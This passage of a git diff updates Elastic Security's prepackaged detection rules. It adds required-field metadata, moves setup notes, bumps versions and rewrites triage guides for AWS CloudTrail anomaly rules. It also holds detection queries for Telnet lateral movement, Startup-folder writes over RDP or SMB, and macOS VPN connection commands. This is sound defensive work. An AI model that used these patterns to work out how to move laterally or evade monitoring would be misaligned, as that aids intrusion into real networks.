"name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e19e64ee-130e-4c07-961f-8a339f0b8362", "severity": "medium", @@ -46,5 +68,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json index 31ca15c44a8bb..9533c29d1ef39 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json @@ -18,6 +18,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1b21abcc-4d9f-4b08-a7f5-316f5f94b973", "severity": "medium", @@ -46,5 +68,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json index d9bfbc276d299..25ec6c93c5975 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Lateral Movement via Startup Folder", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type in (\"creation\", \"change\") and\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n file.path : \"C:\\\\*\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\"\n", + "note": "", + "query": "file where event.type in (\"creation\", \"change\") and\n\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\")\n", "references": [ "https://www.mdsec.co.uk/2017/06/rdpinception/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -68,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json index b5df5a0d3f21d..0c8ab2f1f2845 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN).", + "description": "Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN). Adversaries may use VPN connections to laterally move and control remote systems on a network.", "from": "now-9m", "index": [ "auditbeat-*", @@ -11,15 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Virtual Private Network Connection Attempt", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (\n (process.name : \"networksetup\" and process.args : \"-connectpppoeservice\") or\n (process.name : \"scutil\" and process.args : \"--nc\" and process.args : \"start\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*set VPN to service*\")\n )\n", "references": [ "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/manage/vpn.rb", "https://www.unix.com/man-page/osx/8/networksetup/", "https://superuser.com/questions/358513/start-configured-vpn-from-command-line-osx" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_process_started_in_temp_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_process_started_in_temp_directory.json deleted file mode 100644 index 07dc8f663201b..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_process_started_in_temp_directory.json +++ /dev/null @@ -1,30 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies processes running in a temporary folder. This is sometimes done by adversaries to hide malware.", - "false_positives": [ - "Build systems, like Jenkins, may start processes in the `/tmp` directory. These can be exempted by name or by username." - ], - "from": "now-9m", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Unusual Process Execution - Temp", - "query": "event.category:process and event.type:(start or process_started) and process.working_directory:/tmp and\n not process.parent.name:(update-motd-updates-available or\n apt or apt-* or\n cnf-update-db or\n appstreamcli or\n unattended-upgrade or\n packagekitd) and\n not process.args:(/usr/lib/update-notifier/update-motd-updates-available or\n /var/lib/command-not-found/)\n", - "risk_score": 47, - "rule_id": "df959768-b0c9-4d45-988c-5606a2be8e5a", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 8 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/mfa_disabled_for_google_workspace_organization.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/mfa_disabled_for_google_workspace_organization.json deleted file mode 100644 index fb8130b9fed7a..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/mfa_disabled_for_google_workspace_organization.json +++ /dev/null @@ -1,34 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when multi-factor authentication (MFA) is disabled for a Google Workspace organization. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", - "false_positives": [ - "MFA settings may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "MFA Disabled for Google Workspace Organization", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:(ENFORCE_STRONG_AUTHENTICATION or ALLOW_STRONG_AUTHENTICATION) and google_workspace.admin.new_value:false\n", - "risk_score": 47, - "rule_id": "e555105c-ba6d-481f-82bb-9b633e7b4827", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Identity and Access" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 13 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json index c190c112ead30..2d2a7d14f71a1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json @@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "high_distinct_count_error_message", "name": "Spike in AWS Error Messages", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating Spikes in CloudTrail Errors\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding\nwhat is considered normal behavior within an organization, you can spot suspicious or malicious activity when deviations\noccur. This example rule triggers from a large spike in the number of CloudTrail log messages that contain a particular\nerror message. The error message in question was associated with the response to an AWS API command or method call, this\nhas the potential to uncover unknown threats or activity.\n\n#### Possible investigation steps:\n- Examine the history of the error. Has it manifested before? If the error, which is visible in the `aws.cloudtrail.error_message` field, only manifested recently, it might be related to recent changes in an automation module or script.\n- Examine the request parameters. These may provide indications as to the nature of the task being performed when the error occurred. Is the error related to unsuccessful attempts to enumerate or access objects, data, or secrets? If so, this can sometimes be a byproduct of discovery, privilege escalation or lateral movement attempts.\n- Consider the user as identified by the `user.name field`. Is this activity part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n\n### False Positive Analysis\n- This rule has the possibility to produce false positives based on unexpected activity occurring such as bugs or recent\nchanges to automation modules or scripting.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n- Unusual AWS Command for a User\n- Rare AWS Error Code\n\n### Response and Remediation\n- If suspicious or malicious activity is observed, immediately rotate and delete relevant AWS IAM access keys.\n- If any unauthorized new user accounts were created, remove them. Request password resets for other IAM users.\n- Look into enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n", + "note": "## Triage and analysis\n\n### Investigating Spike in AWS Error Messages\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect a significant spike in the rate of a particular error in the CloudTrail\nmessages. Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery.\n\n#### Possible investigation steps\n\n- Examine the history of the error. If the error only manifested recently, it might be related to recent changes in an\nautomation module or script. You can find the error in the `aws.cloudtrail.error_code field` field.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed\nwhen the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "78d3d8d9-b476-451d-a9e0-7a5addd70670", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json index d9e2b3e358760..3552fa621db0c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json @@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_error_code", "name": "Rare AWS Error Code", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\nInvestigating Unusual CloudTrail Error Activity ###\nDetection alerts from this rule indicate a rare and unusual error code that was associated with the response to an AWS API command or method call. Here are some possible avenues of investigation:\n- Examine the history of the error. Has it manifested before? If the error, which is visible in the `aws.cloudtrail.error_code field`, only manifested recently, it might be related to recent changes in an automation module or script.\n- Examine the request parameters. These may provide indications as to the nature of the task being performed when the error occurred. Is the error related to unsuccessful attempts to enumerate or access objects, data, or secrets? If so, this can sometimes be a byproduct of discovery, privilege escalation, or lateral movement attempts.\n- Consider the user as identified by the `user.name` field. Is this activity part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?", + "note": "## Triage and analysis\n\n### Investigating Rare AWS Error Code\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an unusual error in a CloudTrail message. This can be byproducts of\nattempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection.\n\nDetection alerts from this rule indicate a rare and unusual error code that was associated with the response to an AWS\nAPI command or method call.\n\n#### Possible investigation steps\n\n- Examine the history of the error. If the error only manifested recently, it might be related to recent changes in an\nautomation module or script. You can find the error in the `aws.cloudtrail.error_code field` field.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed\nwhen the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "19de8096-e2b0-4bd8-80c9-34a820813fff", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json index a3d6208eb9f05..cfb1d153c5555 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json @@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_method_for_a_city", "name": "Unusual City For an AWS Command", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating an Unusual CloudTrail Event\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation of the source IP address. Here are some possible avenues of investigation:\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the user as identified by the `user.name` field. Is this command part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Examine the history of the command. If the command, which is visible in the `event.action field`, only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, if it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process.\n- Examine the request parameters. These may provide indications as to the source of the program or the nature of the tasks it is performing.", + "note": "## Triage and analysis\n\n### Investigating Unusual City For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is\nsourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or\nkeys used by a threat actor in a different geography than the authorized user(s).\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation\nof the source IP address.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the \n `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives can occur if activity is coming from new employees based in a city with no previous history in AWS.\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "809b70d3-e2c3-455e-af1b-2626a5a1a276", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json index 7e778083c9d70..b29b6d89ed5c1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json @@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_method_for_a_country", "name": "Unusual Country For an AWS Command", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating an Unusual Country For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding\nwhat is considered normal behavior within an organization, suspicious or malicious activity can be spotted when deviations\nare observed. This example rule focuses on AWS command activity where the country from the source of the activity has been\nconsidered unusual based on previous history.\n\n#### Possible investigation steps:\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the user as identified by the `user.name` field. Is this command part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Examine the history of the command. If the command, which is visible in the `event.action field`, only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, if it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process.\n- Examine the request parameters. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n\n### False Positive Analysis\n- False positives can occur if activity is coming from new employees based in a country with no previous history in AWS,\ntherefore it's important to validate the activity listed in the investigation steps above.\n\n### Related Rules\n- Unusual City For an AWS Command\n- Unusual AWS Command for a User\n- Rare AWS Error Code\n\n### Response and Remediation\n- If suspicious or malicious activity is observed, immediately rotate and delete relevant AWS IAM access keys.\n- Validate if any unauthorized new users were created, remove these accounts 